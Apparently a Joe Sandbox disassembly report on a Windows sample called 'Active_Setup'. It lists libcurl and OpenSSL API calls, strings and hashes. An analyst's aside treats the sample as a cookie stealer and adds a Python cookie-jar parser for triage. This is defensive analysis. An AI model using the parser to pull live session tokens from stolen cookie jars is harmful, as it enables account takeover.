• curl_strequal.ACTIVE_SETUP(?,?,?,?,?,?,?,?,?,?,00000000,?,00FBE4A4,?,00000000,?), ref: 00FBD0BB
Strings
• Connection #%ld isn't open enough, can't reuse, xrefs: 00FBD2A5
• Connection %ld seems to be dead!, xrefs: 00FBCEE0
• Found bundle for host %s: %p, xrefs: 00FBCE49
• Server doesn't support pipelining, xrefs: 00FBCE68
• Connection #%ld is still name resolving, can't reuse, xrefs: 00FBCF60
Similarity
• API ID: curl_strequal
• String ID: Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Connection %ld seems to be dead!$Found bundle for host %s: %p$Server doesn't support pipelining
• API String ID: 1413590006-3058172449
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
• API String ID: 909875538-2908105608
APIs
• curl_msnprintf.ACTIVE_SETUP(-00000004,00000005,%c%c%c%c,?,?,?,43424100,?,?,?,?,?), ref: 00FD4932
• curl_msnprintf.ACTIVE_SETUP(-00000004,00000005,%c%c%c=,?,?,43424100,?,?,?,?,?), ref: 00FD4967
  • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
Strings
Similarity
• API ID: curl_msnprintf$curl_mvsnprintf
• String ID: %c%c%c%c$%c%c%c=$%c%c==$Basic
• API String ID: 405648482-3685042812
APIs
• _fputs.LIBCMT ref: 0104D026
• _fputs.LIBCMT ref: 0104D03F
  • Part of subcall function 01082E9D: __fileno.LIBCMT ref: 01082EEC
  • Part of subcall function 01082E9D: _strlen.LIBCMT ref: 01082F4D
  • Part of subcall function 01082E9D: __lock_file.LIBCMT ref: 01082F56
  • Part of subcall function 01082E9D: __stbuf.LIBCMT ref: 01082F61
  • Part of subcall function 01082E9D: __ftbuf.LIBCMT ref: 01082F7B
  • Part of subcall function 0108352C: _flsall.LIBCMT ref: 01083540
• _fprintf.LIBCMT ref: 0104D06C
• _fprintf.LIBCMT ref: 0104D0EA
• _fputs.LIBCMT ref: 0104D11B
Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fputs$_fprintf$__fileno__ftbuf__lock_file__stbuf_flsall_strlen
                                                                                                                                                  • String ID: Verify failure$Verifying - %s
                                                                                                                                                  • API String ID: 2929492229-2434124770
                                                                                                                                                  • Opcode ID: 58617c338bca47b746a70932cc8def4158000a3e8f71601a57c6283f54051e98
                                                                                                                                                  • Instruction ID: 5a3d8ce050eb2d5c67ded0df2f7e24ffa1cef187743e773b4d3e4450236a7368
                                                                                                                                                  • Opcode Fuzzy Hash: 58617c338bca47b746a70932cc8def4158000a3e8f71601a57c6283f54051e98
                                                                                                                                                  • Instruction Fuzzy Hash: B03106F3A0410237D61176B87C8AEDB339E9FB1210F080475FCD8DB246EA3AD55947A2
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00FB571C
• std::_Lockit::_Lockit.LIBCPMT ref: 00FB5742
• std::bad_exception::bad_exception.LIBCMT ref: 00FB57CA
• __CxxThrowException@8.LIBCMT ref: 00FB57D9
• std::_Lockit::_Lockit.LIBCPMT ref: 00FB57EE
• std::locale::facet::facet_Register.LIBCPMT ref: 00FB5809
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::facet_
• String ID: bad cast
• API String ID: 2820251361-3145022300
• Opcode ID: 87dc7bbe2d7ad8f737776313bd5079f6987ed960ac87136801f72c4a08475719
• Instruction ID: ca401093a4a5d698eb19b608c632241ad49cca3445f8996aca2436d9cd41242e
• Opcode Fuzzy Hash: 87dc7bbe2d7ad8f737776313bd5079f6987ed960ac87136801f72c4a08475719
• Instruction Fuzzy Hash: DA319F35604741DFCB24EF15D891BAA77A0BB54B30F544A1DF8E2972E0DB38A844DF92
APIs
• curl_strequal.ACTIVE_SETUP(0109FD68,00000000,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2C91
• _fputs.LIBCMT ref: 00FC2CC8
• curl_mfprintf.ACTIVE_SETUP(00000000,%s,00000000,?,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2CEA
• curl_mfprintf.ACTIVE_SETUP(00000000,## Fatal libcurl error,?,?,?,?,00000000,00FC2EA3,00FB85F1,?,00000001), ref: 00FC2D19
Strings
• # Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00FC2CC3
• %s, xrefs: 00FC2CE4
• ## Fatal libcurl error, xrefs: 00FC2D13
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: curl_mfprintf$_fputscurl_strequal
• String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s
• API String ID: 2678714247-4016238800
• Opcode ID: 42630454a63fd9df8c8ceb7d23c7d8bce3c9bb9022bfd0c8cce7eeba282da6ac
• Instruction ID: 06781c6f5668c3e709025fe495736ea0882ef3face3f6fe1087683403e578e78
• Opcode Fuzzy Hash: 42630454a63fd9df8c8ceb7d23c7d8bce3c9bb9022bfd0c8cce7eeba282da6ac
• Instruction Fuzzy Hash: 15110473E4171B23CA2035A97E82F6B325DCFB0B31F09042EEC85E6202E995DD51A1A2
APIs
• __CxxThrowException@8.LIBCMT ref: 00FB47CD
  • Part of subcall function 01088E71: RaiseException.KERNEL32(?,?,0107FD3A,?,?,?,?,?,0107FD3A,?,010E5BF8,010F4164), ref: 01088EB3
• __CxxThrowException@8.LIBCMT ref: 00FB4810
• __CxxThrowException@8.LIBCMT ref: 00FB4853
• __CxxThrowException@8.LIBCMT ref: 00FB4891
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 3476068407-1866435925
• Opcode ID: 23df74c34f1e5e27ef4e3d3c78acb6b0bd0c0bf742853a829c4ed2ee23874fb3
• Instruction ID: 1efd039c56fb7191e4d0579a8dd80e218a8f2909e7d11f6ce8408e74263ac3e2
• Opcode Fuzzy Hash: 23df74c34f1e5e27ef4e3d3c78acb6b0bd0c0bf742853a829c4ed2ee23874fb3
• Instruction Fuzzy Hash: 0921F371158340AFC314EB62CC56FDAB7E4AF84714F408A0DF5E996192EB78E108CF22
APIs
• __EH_prolog3.LIBCMT ref: 0109B512
• std::_Lockit::_Lockit.LIBCPMT ref: 0109B51C
  • Part of subcall function 00FB4270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB427F
• codecvt.LIBCPMT ref: 0109B556
• std::bad_exception::bad_exception.LIBCMT ref: 0109B56A
• __CxxThrowException@8.LIBCMT ref: 0109B578
• std::locale::facet::facet_Register.LIBCPMT ref: 0109B58E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: LockitLockit::_std::_$Exception@8H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::facet_
• String ID: bad cast
• API String ID: 1373396938-3145022300
• Opcode ID: b9e61df8ffef417f345c1bcd186e4372e3cb05fb1f9aee73e1a227f7ba5e22ec
• Instruction ID: 052b18a7dfd62ca640cee2b77a006ba8154b4c17b819b7dc32fddf6fd857a1db
• Opcode Fuzzy Hash: b9e61df8ffef417f345c1bcd186e4372e3cb05fb1f9aee73e1a227f7ba5e22ec
• Instruction Fuzzy Hash: 2401803190021A9BCF15FBA4E862EFE7675AF94730F544508E5D1AB1D0DF38AA01AB94
APIs
• ___set_flsgetvalue.LIBCMT ref: 010804F4
  • Part of subcall function 0108771B: TlsGetValue.KERNEL32(0107FCF5,010878A7,?,0107FCF5,?), ref: 01087724
  • Part of subcall function 0108771B: __decode_pointer.LIBCMT ref: 01087736
  • Part of subcall function 0108771B: TlsSetValue.KERNEL32(00000000,0107FCF5,?), ref: 01087745
• ___fls_getvalue@4.LIBCMT ref: 010804FF
  • Part of subcall function 010876FB: TlsGetValue.KERNEL32(?,?,01080504,00000000), ref: 01087709
• ___fls_setvalue@8.LIBCMT ref: 01080512
  • Part of subcall function 0108774F: __decode_pointer.LIBCMT ref: 01087760
• GetLastError.KERNEL32(00000000,?,00000000), ref: 0108051B
• ExitThread.KERNEL32 ref: 01080522
• GetCurrentThreadId.KERNEL32 ref: 01080528
• __freefls@4.LIBCMT ref: 01080548
• __IsNonwritableInCurrentImage.LIBCMT ref: 0108055B
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 1925773019-0
APIs
Strings
Similarity
• API ID: _strncpy
• String ID: .\crypto\dso\dso_win32.c
• API String ID: 2961919466-1566349280
APIs
• curl_msnprintf.ACTIVE_SETUP(?,00000020,%ld,FFFFFFFF), ref: 00FC5644
• curl_msnprintf.ACTIVE_SETUP(?,00000020,.%ld), ref: 00FC5660
• _sprintf.LIBCMT ref: 00FC56C5
Strings
Similarity
• API ID: curl_msnprintf$_sprintf
• String ID: %ld$-$.%ld
• API String ID: 2394090773-3983876956
APIs
  • Part of subcall function 00FD4510: __localtime64.LIBCMT ref: 00FD4515
• curl_msnprintf.ACTIVE_SETUP(?,00003FFF,%s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?,?), ref: 00FCC096
  • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
  • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
Strings
Similarity
• API ID: curl_msnprintf$__localtime64curl_mvsnprintf
• String ID: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since: %s$If-Unmodified-Since: %s$Invalid TIMEVALUE$Last-Modified: %s
• API String ID: 743165356-2575227759
APIs
• curl_msnprintf.ACTIVE_SETUP(?,00004001,%s:%s,?,?,?,Basic,00000000), ref: 00FCAC58
• curl_maprintf.ACTIVE_SETUP(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FCACCD
Strings
Similarity
• API ID: curl_maprintfcurl_msnprintf
• String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
• API String ID: 974754520-2466770355
APIs
• curl_maprintf.ACTIVE_SETUP(%s%s%s%s%s%s%lld%s%s,#HttpOnly_,010E44E2,00000001,FALSE,?,?,?,00FB85F1,?,?,00000000,?), ref: 00FC2C55
Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                                  • String ID: #HttpOnly_$%s%s%s%s%s%s%lld%s%s$FALSE$TRUE$unknown
                                                                                                                                                  • API String ID: 3307269620-3817228265
                                                                                                                                                  • Opcode ID: 460a9519b138ddae8482dbb03ab0eb9e243756f6b3bb9baf6809916a6f0b15cb
                                                                                                                                                  • Instruction ID: c9189bc53b8f9c987d2b637bdc3b4998673b4e531bf91fb8b17d94ac2df31ad4
                                                                                                                                                  • Opcode Fuzzy Hash: 460a9519b138ddae8482dbb03ab0eb9e243756f6b3bb9baf6809916a6f0b15cb
                                                                                                                                                  • Instruction Fuzzy Hash: 1111D0B9B0124B5FDB6CCA06CA65F277B99FB85234F25805DA944CB312C761DC40E350
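The string set attached to the curl_maprintf function above (the #HttpOnly_ preamble, a format with six %s fields, one %lld and two trailing %s, plus TRUE, FALSE and unknown) is consistent with the Netscape cookie-jar line writer that ships in libcurl's cookie code: one tab-separated record per cookie, domain, tail-match flag, path, secure flag, 64-bit expiry, name and value, with HttpOnly cookies written as a comment-looking line prefixed #HttpOnly_. That identification is an analyst's inference from the strings, not a finding stated by the sandbox. For a stealer sample, the practical follow-up is being able to parse such a jar once it is recovered from disk or a capture. The parser and writer below are an added example written for this report; they are not code from the sample, from libcurl or from Joe Sandbox, the sample jar is constructed, and the leading-dot rule in the writer is an assumption about how tail-matching domains are serialised.

```python
"""Parse and re-serialise Netscape / libcurl-style cookie-jar lines.

Added example for this report (not code from the sample, libcurl or Joe Sandbox).
"""
from dataclasses import dataclass
from typing import List, Optional

# Preamble the writer puts in front of HttpOnly cookies; a plain "#" line is a comment.
HTTPONLY_PREFIX = "#HttpOnly_"


@dataclass(frozen=True)
class Cookie:
    domain: str
    tailmatch: bool   # TRUE: cookie also applies to subdomains
    path: str
    secure: bool
    expires: int      # Unix epoch seconds; 0 means a session cookie
    name: str
    value: str
    httponly: bool


def parse_cookie_line(line: str) -> Optional[Cookie]:
    """Return a Cookie for one jar line, or None for comments, blanks and malformed lines."""
    line = line.rstrip("\r\n")
    httponly = False
    if line.startswith(HTTPONLY_PREFIX):
        # HttpOnly cookies look like comments; strip the preamble and keep parsing.
        httponly = True
        line = line[len(HTTPONLY_PREFIX):]
    elif not line or line.startswith("#"):
        return None
    fields = line.split("\t")
    if len(fields) != 7:
        return None
    domain, tailmatch, path, secure, expires, name, value = fields
    if tailmatch not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
        return None
    if not expires.isdigit():
        return None
    return Cookie(domain, tailmatch == "TRUE", path, secure == "TRUE",
                  int(expires), name, value, httponly)


def parse_cookie_jar(text: str) -> List[Cookie]:
    """Parse a whole jar, silently skipping lines that are not cookie records."""
    return [c for c in (parse_cookie_line(ln) for ln in text.splitlines()) if c is not None]


def live_cookies(cookies: List[Cookie], now: int) -> List[Cookie]:
    """Cookies still usable at epoch `now`; session cookies (expires == 0) never age out on disk."""
    return [c for c in cookies if c.expires == 0 or c.expires > now]


def format_cookie_line(c: Cookie) -> str:
    """Serialise one cookie in the field order the writer's format string implies.

    The leading-dot rule (prefix "." for tail-matching domains that lack one) is an
    assumption about the writer, not something the report shows.
    """
    dot = "." if c.tailmatch and not c.domain.startswith(".") else ""
    return "%s%s%s\t%s\t%s\t%s\t%d\t%s\t%s" % (
        HTTPONLY_PREFIX if c.httponly else "",
        dot, c.domain,
        "TRUE" if c.tailmatch else "FALSE",
        c.path,
        "TRUE" if c.secure else "FALSE",
        c.expires, c.name, c.value)


# Constructed sample jar: one HttpOnly+Secure cookie, one session cookie, one junk line.
SAMPLE_JAR = (
    "# constructed sample cookie jar for this example\n"
    "\n"
    "#HttpOnly_.example.com\tTRUE\t/\tTRUE\t1767225600\tsessionid\tabc123\n"
    "example.com\tFALSE\t/account\tFALSE\t0\tprefs\tdark\n"
    "broken line without tabs\n"
)

if __name__ == "__main__":
    for c in parse_cookie_jar(SAMPLE_JAR):
        print(c.domain, c.name, "httponly" if c.httponly else "", "secure" if c.secure else "")
```

When triaging a recovered jar, run parse_cookie_jar over the file and then live_cookies with the time of collection: the session cookies and anything still unexpired are the credentials that need to be revoked.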
APIs
• ___set_flsgetvalue.LIBCMT ref: 010805A2
• __calloc_crt.LIBCMT ref: 010805AE
• __getptd.LIBCMT ref: 010805BB
• CreateThread.KERNEL32(00000000,?,010804EE,00000000,00000000,00FB2076), ref: 010805F2
• GetLastError.KERNEL32 ref: 010805FC
• __dosmaperr.LIBCMT ref: 01080614
  • Part of subcall function 01081557: __getptd_noexit.LIBCMT ref: 01081557
  • Part of subcall function 0107F669: __decode_pointer.LIBCMT ref: 0107F674
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1803633139-0
• Opcode ID: f7f0cdb4a0e865142aa05f377e1d6a6a81660bbcf3a16bf4ef3d6218efb454d9
• Instruction ID: abaafab024139ec862be1fa0aa5084c3d748c942bc1ef1d15bbfd893afe43f62
• Opcode Fuzzy Hash: f7f0cdb4a0e865142aa05f377e1d6a6a81660bbcf3a16bf4ef3d6218efb454d9
• Instruction Fuzzy Hash: 1711017250820AEFDB11BFA8DC818DE7BE8FF54224B200469F6C1D2055EB718955CBA0
APIs
• __CreateFrameInfo.LIBCMT ref: 0109124A
  • Part of subcall function 0108659E: __getptd.LIBCMT ref: 010865AC
  • Part of subcall function 0108659E: __getptd.LIBCMT ref: 010865BA
• __getptd.LIBCMT ref: 01091254
  • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
  • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
• __getptd.LIBCMT ref: 01091262
• __getptd.LIBCMT ref: 01091270
• __getptd.LIBCMT ref: 0109127B
• _CallCatchBlock2.LIBCMT ref: 010912A1
  • Part of subcall function 01086643: __CallSettingFrame@12.LIBCMT ref: 0108668F
  • Part of subcall function 01091348: __getptd.LIBCMT ref: 01091357
  • Part of subcall function 01091348: __getptd.LIBCMT ref: 01091365
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
• String ID:
• API String ID: 1602911419-0
• Opcode ID: 4ffbaf156f4785ed560571b9c94abbba180d586fd4d1860d56abd700f98dbd25
• Instruction ID: f1b44a3dc634e9590b98144c781a63b976dd134084048f7fe5c541c9e337593a
• Opcode Fuzzy Hash: 4ffbaf156f4785ed560571b9c94abbba180d586fd4d1860d56abd700f98dbd25
• Instruction Fuzzy Hash: 60110771D0420ADFDF01EFA5D944AED7BB0FF18324F60806AE8D4A7250DB399A119F50
APIs
• _signal.LIBCMT ref: 0104CD68
  • Part of subcall function 010851F4: __getptd_noexit.LIBCMT ref: 0108525E
  • Part of subcall function 010851F4: __malloc_crt.LIBCMT ref: 0108527D
  • Part of subcall function 010851F4: _siglookup.LIBCMT ref: 010852A3
• _signal.LIBCMT ref: 0104CD76
  • Part of subcall function 010851F4: __lock.LIBCMT ref: 010852E8
  • Part of subcall function 010851F4: SetConsoleCtrlHandler.KERNEL32(01085115,00000001,?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 0108530B
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085357
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085365
• _signal.LIBCMT ref: 0104CD84
  • Part of subcall function 010851F4: GetLastError.KERNEL32(?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 01085327
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085377
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085385
• _signal.LIBCMT ref: 0104CD91
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085397
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853A5
• _signal.LIBCMT ref: 0104CD9F
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 010853B7
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853C5
• _signal.LIBCMT ref: 0104CDAD
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _signal$__decode_pointer__encode_pointer$ConsoleCtrlErrorHandlerLast__getptd_noexit__lock__malloc_crt_siglookup
• String ID:
• API String ID: 1354346430-0
• Opcode ID: 3e6d98ddf54be52e0afe7919fcbc688cdd7e7fc6b09c5e927841180c1d75884c
• Instruction ID: 6e50b830cfe08d9a93d1cb94273bebe59037e8f4debe02cf1428d9a9b4a4c954
• Opcode Fuzzy Hash: 3e6d98ddf54be52e0afe7919fcbc688cdd7e7fc6b09c5e927841180c1d75884c
• Instruction Fuzzy Hash: 27E0597A2441816AFE14F7A8ED83FB73219B795B00F00410C7BC89E584DEB66844C762
APIs
